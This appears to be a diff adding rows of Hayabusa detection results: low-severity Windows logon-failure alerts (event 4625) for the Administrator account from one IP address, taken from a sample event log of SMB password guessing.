+2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1FJ6vm3wK97iual | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLuIx0sfF8NQD8QY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y3lMvcrrmGTkjdlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZqOabcNMeazs6TC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2AbE9D8PvuFDBz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzWdLEEc68ZvviGh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtV3BuZiljbAeikO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnKKfcwikNDdYOam | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jSbbzD7fpJY4Q1JL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gOASpLLE25ruCnGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jhUGOtszbPUwccL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yB8Mzo1RppdpLFKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOwoUlHGVeSbAhuN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BXIEHbkrjwedeaih | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OvsKoixgEzUgAyie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TzaZe6Y4Tdfjseuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEmbuU3CAC3CecZy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kfBmqmVPd0CGVUsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Uz3TlU6yrcveM1w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z6hH6AkkgBFmeZ6u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2J1W2WhA6Pj7j5j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: soHOxnkoOn7ot0My | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4c2oWI6mRIvSVSKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKsXD8aTyaC4fBqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrzji5ucmutsZNpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BApOU105FCLwj4zn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EO50f7NfrrdwwCNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PfTYbWC8IjW87th8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wLnE6zm5US4maK04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AV7taC7hYQdVjAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8MnnaSRs0bnYVlMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YgqavZ1SuNvX7RgH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IQvoIsfW0LhDit2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 33IPGQXc1MarY30J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: II4Ly9LnkWlq60Ux | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wncfJC7kDSI7O9Ud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6XzbWef3PuzQK3FJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M5670HdNC6c8O56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ea8FcddgLyV5o6oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjyhmKFdBNrHIvTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIF47pEWBMp6Nbym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6TO891WvJPkdjsct | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6cLnJYpHEzGAvhWG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gy6cFTrwrpRQFxfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gxz612Z88PMCKzAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GSPC8hibdZdyOcex | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6vlmykLeFmuhn81B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w4lEW9w53zMFPcc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jt2lDRFWwi6adwlB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G9MGvle35u5OGB5o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJgLFM2vrnKuj5N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8HRyDAzwKj9bfnA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J65LcwnRgEob9wjY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhas9e1fwDZ1Fxvt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5qJRSpjS6tZJjNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bo4HAgP2tw0GmZ4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zv0cbLCD7E05i0g5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FIKsQLk5iPyKoeqM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RiHAaBszJBGe2deQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8em4eOiqze683Cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86lXQsnn7dae93tW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Iu8olNGPmhxh6iNu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZYtN5EMHxcNqID6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mtUQGxrMoPkpUQCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYh4e3bpePhDoRwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UkC8E9uKpCgD1BHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZCDxpmDZbpGCey3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SS2dxS3WvCrAyiB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YT3VHxKNf8q14rro | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fx9HQT3u3Ig6vJ3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FukPQsr4SXRshyTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7AutKUyPELNRUcA4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 38gBkWcYdZW6Wcdz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HMKnLRQCDn1CHZdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
